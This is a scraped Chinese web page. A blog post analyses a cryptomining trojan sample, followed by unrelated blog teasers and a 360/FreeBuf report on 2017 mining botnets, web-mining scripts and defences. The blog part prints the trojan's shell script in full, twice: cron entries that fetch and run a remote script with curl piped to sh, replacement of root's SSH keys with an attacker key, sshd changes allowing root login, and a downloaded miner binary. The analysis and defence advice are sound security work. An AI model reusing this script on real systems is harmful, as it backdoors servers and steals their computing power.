木马来袭：（2）今天你被挖矿了吗？ - 简书
木马来袭：（2）今天你被挖矿了吗？
书接上文，针对编号101样本的分析，我们已经知道，黑色产业界通过植入木马，控制了大量主机资源，只要有人花钱，就可以按需要调度足够的资源发动DDos攻击，据说还可以按效果付费。
此外，还有一种常见模式则是“挖矿木马”，首先还是来看样本：
0 19:53 pts/0
00:00:00 grep min
1 99 19:48 ?
/opt/minerd -B -a cryptonight
-o stratum+tcp://xmr.crypto-pool.fr:8080 -u
48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKk
cvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x
uptime看到的负载值非常高。
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" & /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" & /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" & ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" && /etc/ssh/sshd_config
echo "RSAAuthentication yes" && /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" && /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" && /etc/ssh/sshd_config
/etc/init.d/sshd restart
if [ ! -f "/etc/init.d/lady" ]; then
if [ ! -f "/etc/systemd/system/lady.service" ]; then
mkdir -p /opt
curl -fsSL https://r.chanstring.com/v12/lady_`uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33
service lady start
systemctl start lady.service
/etc/init.d/lady start
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" & /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" & /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" & ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" && /etc/ssh/sshd_config
echo "RSAAuthentication yes" && /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" && /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" && /etc/ssh/sshd_config
/etc/init.d/sshd restart
if [ ! -f "/etc/init.d/lady" ]; then
if [ ! -f "/etc/systemd/system/lady.service" ]; then
mkdir -p /opt
curl -fsSL https://r.chanstring.com/v12/lady_`uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33
service lady start
systemctl start lady.service
/etc/init.d/lady start
mkdir -p /opt
# /etc/init.d/lady stop
# systemctl stop lady.service
# pkill /opt/cron
# pkill /usr/bin/cron
# rm -rf /etc/init.d/lady
# rm -rf /etc/systemd/system/lady.service
# rm -rf /opt/KHK75NEOiq33
# rm -rf /usr/bin/cron
# rm -rf /usr/bin/.cron.old
# rm -rf /usr/bin/.cron.new
被植入比特币“挖矿木马”的电脑，系统性能会受到较大影响，电脑操作会明显卡慢、散热风扇狂转；另一个危害在于，“挖矿木马”会大量耗电，并造成显卡、ＣＰＵ等硬件急剧损耗。比特币具有匿名属性，其交易过程是不可逆的，被盗后根本无法查询是被谁盗取，流向哪里，因此也成为黑客的重点窃取对象。
植入方式：安全防护策略薄弱，利用Jenkins、Redis等中间件的漏洞发起攻击，获得root权限。
最好的防御可能还是做好防护策略、严密监控服务器资源消耗（CPU／load）。
这种木马很容易变种，很多情况杀毒软件未必能够识别：
c05b2c5f8fd62e98dba6de45c7d751a2e
chanstring.png
愿交天下士,罄我怀中藏。
https://riboseyim.github.io
最近电视、新闻、网站经常有讲到比特币，但普通人经常被比特币的各种信息搞得一头雾水，到底什么是比特币，它是谁开发的，它跟Q币有什么区别，它是不是一个庞氏骗局，它是不是一个击鼓传花的游戏，它会不会很容易就收到控制，等等。在这里，我试图从各个层面进行探讨，用一些通俗易懂的表达，来...
7、比特币的缺陷（未完成）7.1、被误会的缺陷（原理类）比特币是一种全新的，从未有过的货币，因此对其有诸多的误解，从论坛摘取了有代表性的误解，举例如下：7.1.1、比特币并不稀缺，任何一个程序员都可以再造出更多的比笨币，比傻币，比蠢币比特币的代码是开源的，任何人都能略为修改...
原文： 以太坊爱好者 区块链技术简史（一个法律人的学习笔记）作者：蔡欣，湖北最高检查院检查官 在世界经济组织（WEF）于2016年8月中旬发布的重磅报告中，给区块链（BlockChain）用了一个看起来洋气高端的名字，DLT（分布式总账技术，Distri...
1. DDoS简介： 1.1 DdoS定义： DDOS是什么？分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DDoS攻击，从而成倍地提高拒绝服务攻击的...
我的手机里收集着一段音频，叫《爱自己宣言》，我已经不记得是何时保存下来的，我原不知道这是谁的声音，今天，我专门百度了一下，原来是来自身心美学作家张芝华“找回内心的真爱——深度关系疗愈工作坊”中的练习。 今年以来，虽然觉得自己的心境已经变得平和了很多，但是，每天早上起来，心中...
作者：小倩 新西兰，朋友一家十年前就多次邀请我去游玩，也许是机缘未到一直未能成行。今年终于踏上了这神秘岛国。南半球的季节与国内相反，9,10月份正好是新西兰的初春，万物复苏，春意盎然，湖泊、森林、牧场、雪山和海岸，各种自然景色浪漫多彩，美轮美奂，又依然质朴而纯净。再说也是多...
https://github.com/0532
害怕是一种消极情绪，它会限制你的观察力和思维能力。当你通过自己的生活认识到这一点时，你可以顺着以下五个步骤来避免害怕。 一、认识害怕 你最害怕的是什么？害怕自己的公司会破产；害怕自己永远都找不到生命中那个特殊的人；还是害怕会失去你爱的人？拥有这些害怕的消极情绪会时常影响你的...
现在你是单身，谈个恋爱很难？ 我认为 谈了恋爱，或是结了婚的人 想再谈恋爱，才是的真的难 但你说你一条单身汪 没有人约束你的自由，没有人在意你和谁喝酒 没有人查你的手机，没有人管你和谁在调情 从技术上来说，谈个恋爱，很难？ 这话看上去貌似没有道理 你还会用“没碰到合适的人”...　>　　>　正文
电脑忽然发热变卡？当心潜伏的挖矿木马
21世纪经济报道　　
日前，星巴克某店wifi和知名激活工具KMS相继爆出被植入挖矿木马，将这个新兴的网络安全杀手推向前台。360公司日前发布2017年度挖矿木马研究报告（下称“报告”），对2017年挖矿木马的种类、发展趋势、危害进行全面分析，并提出了相关防范措施。
21世纪经济报道&日前，星巴克某店wifi和知名激活工具KMS相继爆出被植入挖矿木马，将这个新兴的网络安全杀手推向前台。360公司日前发布2017年度挖矿木马研究报告（下称“报告”），对2017年挖矿木马的种类、发展趋势、危害进行全面分析，并提出了相关防范措施。“寄生虫”—两种吸血方式揭秘360发布的报告详细介绍了挖矿木马的前世今生：数字货币的发行直接导致了挖矿木马的出现。由于数字货币并非由特定的货币发行机构发行，而是由挖矿机程序依据特定算法通过大量运算所得，不法分子将挖矿机程序植入受害者的计算机中，利用受害者计算机的运算力进行挖矿，这种用户不知情的挖矿机程序就是挖矿木马。随着数字货币交易价格的走高，挖矿木马数量近年来急剧增加。图一：比特币2013年-2017年交易价格变化趋势如果将明目张胆的勒索软件比喻成威胁网络安全的恶魔，那么潜伏在计算机隐蔽之处的挖矿木马，就好比会吸血的“寄生虫”，这种“寄生虫”的敛财方式主要有两种——僵尸网络和网页挖矿。挖矿木马僵尸网络就是黑客通过入侵其他计算机植入挖矿木马，并通过木马继续入侵更多计算机，从而建立起庞大的傀儡计算机网络。2017年同样是挖矿木马僵尸网络大爆发的一年，出现了“Bondnet”，“Adylkuzz”，“隐匿者”等多个大规模挖矿木马僵尸网络。图二：挖矿木马僵尸网络配置“永恒之蓝”模块情况报告中指出，早在WannaCry之前，就有挖矿木马利用“永恒之蓝”进行传播，例如“隐匿者”僵尸网络，就是凭借“永恒之蓝”站稳脚跟，在2017年4月底爆发式增长。“永恒之蓝”因为攻击无需载体、目标广的绝对优势，成为本年度挖矿木马僵尸网络的标配。在2017年9月，因盗版资源集散地Pirate Bay（海盗湾）被发现在网页中植入挖矿脚本，网页挖矿开始走入大众视线。
上证指数：-
深证成指：-
创业板指：-
纳斯达克--
恒生指数--
澳洲普通股--
英国富时--
法国CAC4O--闷声发大财年度之星：2017挖矿木马的疯狂敛财暗流 - FreeBuf互联网安全新媒体平台 | 关注黑客与极客
闷声发大财年度之星：2017挖矿木马的疯狂敛财暗流
共368994人围观
，发现 6 个不明物体
0×1 前言
如果说勒索病毒是暴露在大众视野中的“恶魔”，那么挖矿木马就是潜藏在阴暗之处的“寄生虫”。在2017年这个安全事件频发的年份，除了受到全世界关注的“WannaCry”勒索病毒的出现之外，一大波挖矿木马也悄然崛起。不同于勒索病毒的明目张胆，挖矿木马隐蔽在几乎所有安全性脆弱的角落中，悄悄消耗着计算机的资源。由于其隐蔽性极强，大多数PC用户和服务器管理员难以发现挖矿木马的存在，这也导致挖矿木马数量的持续上涨。本文将通过多个方面介绍挖矿木马的种类，发展趋势，危害以及防范措施。
0×2 挖矿木马概述
2009年，比特币横空出世。得益于其去中心化的货币机制，比特币受到许多行业的青睐，其交易价格也是一路走高。图1展示了比特币从2013年7月到2017年12月交易价格（单位：美元）变化趋势。
图1 比特币2013年-2017年交易价格变化趋势
由于比特币的成功，许多基于区块链技术的数字货币纷纷问世，例如以太币，门罗币等。这类数字货币并非由特定的货币发行机构发行，而是依据特定算法通过大量运算所得。而完成如此大量运算的工具就是挖矿机程序。
挖矿机程序运用计算机强大的运算力进行大量运算，由此获取数字货币。由于硬件性能的限制，数字货币玩家需要大量计算机进行运算以获得一定数量的数字货币，因此，一些不法分子通过各种手段将挖矿机程序植入受害者的计算机中，利用受害者计算机的运算力进行挖矿，从而获取利益。这类在用户不知情的情况下植入用户计算机进行挖矿的挖矿机程序就是挖矿木马。
挖矿木马最早出现于2013年。图2展示了自2013年开始国内披露的大规模挖矿木马攻击事件数量。
图2 2013年-2017年国内披露的挖矿木马攻击事件
由于数字货币交易价格不断走高，挖矿木马的攻击事件也越来越频繁，不难预测未来挖矿木马数量将继续攀升。
对于挖矿木马而言，选择一种交易价格较高且运算力要求适中的数字货币是短期内获得较大收益的保障。图3展示了挖矿木马所选择的币种比例。
图3 挖矿木马所选币种比例
不难看出，门罗币是最受挖矿木马亲睐的币种。黑客之所以选择门罗币作为目标主要有以下几个原因：
（1）门罗币交易价格不俗。虽然门罗币在交易价格上不比比特币，但其依然保持在一个较高的交易价格。
（2）门罗币是一种匿名币，安全性更高。匿名币是一种在交易过程中隐藏交易金额、隐藏发送方与接收方的一种特殊的区块链代币。由于这样一个特性，任何人都无法在区块链浏览器中查找到门罗币交易的金额和交易双方的地址。这也为黑客转移门罗币提供便利。
（3）门罗币是基于CryptoNight 算法运算得到的，通过计算机的CPU和GPU即可进行该算法的运算而不需要其他特定的硬件支持。
（4）互联网上有许多优秀的开源门罗币挖矿项目，黑客可以“即拿即用”。
（5）暗网市场支持门罗币交易。
由于门罗币的这些“优点”，越来越多的挖矿木马选择门罗币作为目标。
在下文中我们将根据挖矿木马的种类分别对不同类型的挖矿木马进行详细介绍和分析。
0×3 挖矿木马详解
1.挖矿木马僵尸网络兴起
僵尸网络（Botnet）是黑客通过入侵其他计算机，在其他计算机中植入恶意程序并通过该恶意程序继续入侵更多计算机，从而建立起来的一个庞大的傀儡计算机网络。僵尸网络中的每一台计算机都是一个被黑客控制的节点，也是一个发起攻击的节点。黑客入侵计算机并植入挖矿木马，之后利用被入侵的计算机继续向其他计算机植入挖矿木马从而构建的僵尸网络就是挖矿木马僵尸网络。
2017年是挖矿木马僵尸网络大规模爆发的一年，出现了“Bondnet”，“Adylkuzz”，“隐匿者”等多个大规模挖矿木马僵尸网络，而其中很大一部分的挖矿木马僵尸网络来自于中国。
（1）僵尸网络的建立
僵尸网络是否能成规模关键在于僵尸网络的初步建立。黑客需要一个能够完成大规模入侵的攻击武器以获得更多计算机的控制权。
“永恒之蓝”漏洞攻击武器的出现助长了挖矿木马僵尸网络的建立。2017年4月，shadow broker公布了NSA（美国国家安全局）方程式组织的漏洞攻击武器“永恒之蓝”。2017年5月爆发的造成空前影响的“WannaCry”勒索病毒就是通过“永恒之蓝”进行传播的。而在“WannaCry”爆发之前，已有挖矿木马利用“永恒之蓝”进行传播。“永恒之蓝”有两个其他漏洞利用工具无法企及的优势：
（1）攻击无需载体。不同于利用浏览器漏洞或者办公软件漏洞进行的“被动式攻击”，“永恒之蓝”漏洞利用攻击是一种“主动式攻击”，黑客只需要向目标发送攻击数据包而不需要目标进行额外的操作即可完成攻击。
（2）攻击目标广。只要目标计算机开启445端口且未及时打补丁，黑客就可以成功入侵目标计算机。黑客完全可以进行全网扫描捕捉猎物。
正因此，“永恒之蓝”一时间成了挖矿木马僵尸网络的标配。表1展示了2017年爆发的几个大规模挖矿木马僵尸网络配备“永恒之蓝”漏洞利用武器的情况。
表1 挖矿木马僵尸网络配置“永恒之蓝”模块情况
其中一些僵尸网络是完全依靠“永恒之蓝”漏洞攻击武器站稳脚跟的，例如“隐匿者”僵尸网络。图4展示了“隐匿者”僵尸网络僵尸程序传播量变化趋势。不难看出，借助于“永恒之蓝”漏洞攻击武器，“隐匿者”在2017年4月底爆发式增长。（更多细节见报告：）
图4 “隐匿者”僵尸网络僵尸程序各版本传播量
随着漏洞的更多细节公之于众，各式各样的“永恒之蓝”漏洞攻击工具问世。在2017年9月出现并呈增长趋势的“mateMiner”僵尸网络中集成了由Powershell编写的“永恒之蓝”漏洞攻击模块。图5展示了部分攻击代码。
图5 “mateMiner”僵尸网络“永恒之蓝”模块部分代码片段
除了“永恒之蓝”漏洞攻击武器之外，其它各类Nday漏洞也备受挖矿木马僵尸网络的亲睐。“yamMiner”僵尸网络就是利用Java 反序列化漏洞进行服务器入侵的。
“yamMiner”僵尸网络2016年底出现，并在2017年呈现增长趋势，目前仍处在活跃状态。该僵尸网络建立之初，通过Java Commons Collections反序列化漏洞入侵服务器，漏洞如下所示：
（更多细节见：）
使用Nday漏洞进行入侵攻击对于未打补丁的计算机而言效果立竿见影。而国内未能及时打补丁的计算机数量并不少，这也是这类挖矿木马僵尸网络持续保持活跃的重要原因之一。
（2）僵尸网络的扩张
当僵尸网络初具雏形后，黑客需要通过现有的傀儡机攻击更多的计算机，通过量的积累转化为可见的利益。因此，僵尸网络中的每一台傀儡机都是攻击的发起者，而他们的目标是互联网中的所有计算机。
“永恒之蓝”漏洞攻击武器在僵尸网络的扩张中起到重要的作用。在上文中展示了“永恒之蓝”漏洞攻击武器在僵尸网络建立时发挥的重要作用，这些同样作用于僵尸网络的扩张，在此不再赘述。
端口扫描和爆破也是僵尸网络扩张的帮手。“隐匿者”挖矿木马僵尸网络中带有全网扫描模块，僵尸程序会不断地对随机ip进行指定端口扫描，若端口开放则尝试进行爆破，爆破成功后则登录目标计算机植入挖矿木马和僵尸程序，继续进一步的扩张。图6展示了“隐匿者”挖矿木马僵尸网络端口扫描模块代码片段。表2展示了“隐匿者”僵尸网络爆破模块、爆破对象以及当前支持情况。
图6 “隐匿者”僵尸网络端口扫描模块代码片段
表2 “隐匿者”僵尸网络爆破模块概览
高级内网渗透攻击开始出现在挖矿木马僵尸网络的扩张中。我们在“mateMiner”僵尸网络中发现了使用“pass the hash”攻击进行内网渗透的模块。僵尸网络释放了凭证窃取工具mimikatz获取保存在本计算机中的凭证，并用其进行“pass the hash”攻击。图7展示了“mateMiner”僵尸网络凭证获取模块的代码片段。
图7 “mateMiner”僵尸网络凭证获取模块代码片段
“mateMiner”僵尸网络会首先尝试使用这些凭证登录内网中的其他计算机，一旦登录成功就往这些计算机中植入挖矿木马和僵尸程序，只有尝试登录失败才会使用“永恒之蓝”漏洞攻击武器进行入侵。可见，随着“永恒之蓝”漏洞攻击成功率的降低，诸如 mimikatz这类高级内网渗透工具已经开始被挖矿木马僵尸网络所使用。图8展示了“mateMiner”僵尸网络进行内网渗透的代码片段。
图8 “mateMiner”僵尸网络内网渗透模块代码片段
（3）僵尸程序的持续驻留
黑客是否能够持续控制傀儡机关键在于傀儡机中的僵尸程序能否持续驻留。而挖矿木马僵尸网络也是用尽了各种办法让僵尸程序持续驻留在傀儡机中。
将僵尸程序直接寄生在系统进程中是最好的选择。“yamMiner”僵尸网络在利用Java反序列化漏洞入侵计算机后直接在Java进程中执行命令。而“隐匿者”僵尸网络在通过爆破MSSQL服务入侵其他计算机后以SQLServer Job的形式运行挖矿机，并且在SQLServer中写入多段shellcode。图9展示了“隐匿者”在SQLServer中写入的一段shellcode。
图9 “隐匿者”僵尸网络在SQLServer中写入的shellcode
通过将僵尸程序寄生在系统进程中能够有效逃避杀毒软件的拦截，保证僵尸程序的持续驻留。
WMI， PowerShell都是持续驻留的好帮手。许多僵尸网络通过WMI实现僵尸程序在目标计算机中的持续驻留，并且使用PowerShell协助完成工作。
“隐匿者”僵尸网络在SQLServer中的shellcode就包含了使用WMI进行挖矿机配置文件定时更新的功能。图10展示了这段shellcode的内容。
图10 “隐匿者”僵尸网络使用WMI进行定期更新的shellcode片段
而“mateMiner”僵尸网络仅仅使用一个PowerShell脚本作为僵尸程序，这也是它最大的特点。这个PowerShell脚本完成了包括入侵、持续驻留、挖矿在内的所有功能。图11展示了“mateMiner”僵尸网络从黑客服务器下载执行PowerShell脚本的命令行。
图11 “mateMiner”僵尸网络执行PowerShell命令行片段
除了利用PowerShell脚本完成工作，“mateMiner”更是将WMI的灵活性发挥到了极致，不仅使用WMI的__EventFilter类实现持续驻留，还将shellcode保存为WMI下类属性的值，需要时载入内存执行，真正实现“无文件”攻击。图12展示“mateMiner”使用WMI下类属性存储shellcode的代码片段。
图12 “mateMiner”使用WMI存储shellcode代码片段
由于PowerShell和WMI有极高的灵活性，僵尸网络能够通过两者有效管理傀儡机，并且减少恶意文件的释放，躲避杀毒软件的查杀。
先进的控制与命令方式是持续驻留的关键。每个僵尸网络都有一个最终的控制端，这个控制端负责向僵尸网络中的每个节点下发控制指令。由于控制端的存活时间并不长，其ip地址会频繁进行更换，因此挖矿木马僵尸网络需要一套完备的控制体系以保证随时与控制端联系。
“隐匿者”僵尸网络就拥有一套完善的控制体系。图13展示了“隐匿者”僵尸网络中僵尸程序与控制端之间的交互。
图13 “隐匿者”僵尸网络僵尸程序与控制端交互图
“隐匿者”有多个功能不同的控制服务器，分别负责挖矿木马的更新、僵尸程序的更新以及远控木马的下发。当傀儡机中的僵尸程序启动时，会进行一次自检，以确定是否有新版本的僵尸程序存在。同时，“隐匿者”也在SQLServer中写入这样一段自检的shellcode，以保证僵尸程序被杀后还能从控制端下载新的僵尸程序。而僵尸程序所请求的控制端ip地址是不固定的，“隐匿者”通过访问指定博客获取博文内容，通过博文内容解密得到控制端ip。控制者只需修改博文内容就能够实现控制端ip的更换。
当然，将控制端ip的快速更新展现得淋漓尽致的当数“yamMiner”挖矿木马僵尸网络了。其控制端ip地址基本保持了一星期一更新的频率。图14展示了“yamMiner”僵尸网络2017年11月至12月控制端ip地址更新时间线。
图14 “yamMiner”僵尸网络2017年11月-12月更新概况
通过观察“yamMiner”僵尸网络2017年11月到12月向控制端发起的请求数量我们发现了一个有趣的细节。这可以从图15展现。
图15 “yamMiner”僵尸网络2017年11月-12月发送请求数量概况
不难看出，当“yamMiner”的控制端ip发生变化的时候，傀儡机中的僵尸程序能够立即连接新的ip地址，所以就有了图中新控制端ip地址出现时旧控制端ip地址请求数量下降到0的现象。实现这样的效果就要求傀儡程序能够实时获知ip地址的变化情况，而“yamMiner”就是利用Java Commons Collections反序列化漏洞周期性地在傀儡机上执行命令，修改傀儡程序连接的控制端ip。由于这一功能是在Java进程中实现的，能够有效躲避杀软的查杀。一般情况下僵尸网络控制端ip地址存活时间不长，优秀的挖矿木马僵尸网络会利用漏洞在傀儡机执行命令更改控制端ip或者将控制端ip存储在例如博客内容这类容易修改又不容易被发现的位置。如果傀儡机所有者不修补计算机系统中存在的漏洞或者删除计算机中持续工作的一些项目（例如SQLServer中的恶意Job），僵尸程序就能在傀儡机中生生不息。
挖矿机僵尸网络是2017年大规模爆发的一个安全威胁，它的危害程度可以从黑客获利的金额展现。图16和图17分别展示了 “yamMiner”僵尸网络的门罗币钱包之一和“隐匿者”僵尸网络的门罗币钱包。
图16 “yamMiner”僵尸网络门罗币钱包之一概况
图17 “隐匿者”僵尸网络门罗币钱包概况
截至笔者撰稿时“隐匿者”僵尸网络从傀儡机中总共挖到了2010枚门罗币，合计61万美元。“yamMiner”僵尸网络其中一个钱包就获利4万美元，而“yamMiner”拥有多个门罗币钱包，可想而知其总获利金额。挖矿木马带来的暴利导致各家僵尸网络竞争的白热化，其中不乏对其他僵尸网络的攻击。例如“mateMiner”僵尸网络会根据其他僵尸网络的矿池端口结束相应进程，如图18所示。
图18 “mateMiner”僵尸网络结束其他挖矿木马进程代码片段
当然，这样的竞争还会持续下去，数字货币交易价格的持续走高必将使更多的不法分子加入到这场僵尸网络之战中。&
2.网页挖矿脚本横空出世
2017年9月，著名的BT站点，同样也是盗版资源集散地的Pirate Bay（海盗湾）被发现在网页中植入挖矿脚本，网页挖矿开始进入公众的视野。
当用户访问一个网页时，用户的浏览器负责解析该网站中的资源、脚本，并将解析的结果展示在用户面前。当用户访问的网页中植入了挖矿脚本，浏览器将解析并执行挖矿脚本，利用用户计算机资源进行挖矿从而获利。挖矿脚本的执行会导致用户计算机资源被严重占用，导致计算机卡慢，甚至出现死机等情况，严重影响用户计算机的正常使用。
网页挖矿脚本种类众多，目前发现的植入到网页中的挖矿脚本有Coinhive，JSEcoin，reasedoper，LMODR.BIZ，MineCrunch，MarineTraffic，Crypto-Loot，ProjectPoi等，大部分挖矿脚本项目都是开源的，这也方便一些站长或网站入侵者在网页中植入挖矿脚本。图19展示了2017年11月至12月不同网页挖矿脚本的占比情况。
图19 2017年11月-12月不同挖矿脚本占比
可以看出，Coinhive是大多数不法分子的选择，这也归功于Coinhive的便捷性。入侵网站的黑客或者贪图利益的站长并不需要将挖矿的js代码写入网页中，而是在网页中调用Coinhive官网中的js文件coinhive.min.js并指定一个唯一的标识符即可。图20展示了Coinhive的代码范例。
图20 “Coinhive”挖矿脚本代码范例
随着网页挖矿脚本的兴起，许多网站开始通过一些特殊技巧掩盖挖矿时所产生的大量系统资源消耗。2017年9月，有安全研究人员发现后缀为.com.com的域名挂有挖矿代码。这些网站以“安全检查”作为幌子掩盖挖矿时系统的卡慢。如图21所示。
图21 挖矿脚本用“安全检查”迷惑用户
无独有偶，前段时间，malwarebytes安全研究人员发现某些包含挖矿代码的网页会在用户关闭浏览器窗口后隐藏在任务栏右下角继续挖矿。如图22所示。（图片来自：）
图22 挖矿脚本利用任务栏隐藏自身
在这些被植入挖矿脚本的网站中，一部分是贪图利益的站长主动将挖矿脚本嵌入网页中的，而另一部分则是黑客入侵网站之后植入挖矿脚本的。2017年11月我们发现一批网站被植入了带有相同标识符的ProjectPoi挖矿脚本，但这一批网站之间并没有丝毫关联，可以推测，是黑客入侵网站之后植入的挖矿脚本。图23展示了这些网站中植入的挖矿脚本。
图23 一些被黑客入侵的站点中植入的挖矿脚本
不同于通过入侵服务器搭建挖矿木马僵尸网络，网页挖矿脚本更容易被用户所察觉，但由于利益驱使依然有许多网站中被植入了挖矿脚本。图24展示了2017年9月-12月网页植入挖矿脚本数量变化趋势。不难看出，网页挖矿脚本数量还在不断增加，特别是进入12月后数量有明显上涨的趋势。
图24 2017年11月-12月网页挖矿脚本数量变化趋势
网页挖矿脚本之所以如此活跃，主要是因为大部分挖矿脚本都来自于色情网站这一类特殊的站点，由于这类网站的高访问量导致挖矿脚本数量的持续升高。图25展示了网页挖矿脚本在各类网站中出现的比例，不难看出，色情网站是网页挖矿脚本的重灾区。
图25 各类网站植入挖矿脚本比例
相比较挖矿木马僵尸网络，网页挖矿脚本属于后起之秀，但出现时间晚并不能阻止此类挖矿木马的兴起，巨大的利益驱动促使更多的黑产从业者投身挖矿事业中。但由于网页挖矿隐蔽性较低，未来黑产从业者可能会将挖矿目标转移到网页游戏和客户端游戏中，通过游戏的资源高消耗率掩盖挖矿机的运作。而移动平台也有可能是挖矿木马的重要目标。
0×4 防范与总结
挖矿木马的崛起源于数字货币交易价格的持续走高，从当前的情况看，数字货币交易价格还将持续攀升，这也将可能导致挖矿木马数量的激增。因此，如何防范挖矿木马是重中之重。
1.防范挖矿木马僵尸网络
挖矿木马僵尸网络的目标是服务器，黑客通过入侵服务器植入挖矿机程序获利。如果能对黑客的入侵行为进行有效防范，就能够将挖矿木马僵尸网络扼杀在摇篮中。作为服务器管理员，进行如下工作是防范挖矿木马僵尸网络的关键：
（1）避免使用弱口令。从上文可知，“隐匿者”这类规模庞大的僵尸网络拥有完备的弱口令爆破模块，因此避免使用弱口令可以有效防范僵尸程序发起的弱口令爆破。管理员不仅应该在服务器登录帐户上使用强密码，在开放端口上的服务（例如MSSQL服务，MySQL服务）也应该使用强密码。
（2）及时为操作系统和相关服务打补丁。许多挖矿木马僵尸网络利用“永恒之蓝”漏洞利用武器进行传播，而“隐匿者”更是在“永恒之蓝”漏洞利用武器泄露的几天后就开始将它用于真实攻击，可见黑客对于1day，Nday漏洞的利用十分娴熟。由于大部分漏洞细节公布之前相应厂商已经推送相关补丁，如果服务器管理员能够及时为系统和相关服务打补丁就能有效避免漏洞利用攻击。服务器管理员需要为存在被攻击风险的服务器操作系统、Web服务端、开放的服务等及时打补丁。
（3）定期维护服务器。由于挖矿木马会持续驻留在计算机中，如果服务器管理员未定期查看服务器状态，那么挖矿木马就难以被发现。因此服务器管理员应定期维护服务器，内容包括但不限于：查看服务器操作系统CPU使用率是否异常、是否存在可疑进程、WMI中是否有可疑的类、计划任务中是否存在可疑项、是否有可疑的诸如PowerShell进程、mshta进程这类常被用于持续驻留的进程存在。
2.防范网页挖矿脚本
网页挖矿脚本一般针对PC，因此也较容易被发现，用户可以通过以下几方面防范网页挖矿脚本：
（1）浏览网页时留意CPU使用率。由于挖矿脚本的运行会导致CPU使用率飙升，如果用户在浏览网页时发现计算机CPU使用率飙升且大部分CPU使用来自于浏览器，那么网页中可能嵌入挖矿脚本。
（2）不访问浏览器或杀毒软件标记为高风险的网站。如今大部分杀软和主流浏览器都具备检测网页挖矿脚本的能力，若用户访问的网站是被标注为高风险的恶意网站，那么网站中可能嵌入了挖矿脚本。不访问被标记为高风险的网站也能避免挂马攻击。
2017年是挖矿木马爆发的一年，而2018年可能是挖矿木马从隐匿的角落走向大众视野的一年。阻止挖矿木马的兴起是杀毒软件的重要责任，而防范挖矿木马的入侵是每一位服务器管理员、PC用户需要时刻注意的重点。防御挖矿木马，保护用户的计算机安全，任重而道远！
0×5 参考链接
[1] 利用服务器漏洞挖矿黑产案例分析；
[2] 悄然崛起的挖矿机僵尸网络：打服务器挖价值百万门罗币；
[3] Persistent drive-by cryptomining coming to a browser near you；
[4] “门罗币最近没落了吗？什么原因？”问题“艾俊强”的回答；
*本文作者：360 安全卫士，转载请注明来自 FreeBuf.COM
用户体验很重要。
必须您当前尚未登录。
必须（保密）
360安全卫士官方账号
关注我们 分享每日精选文章
可以给我们打个分吗？}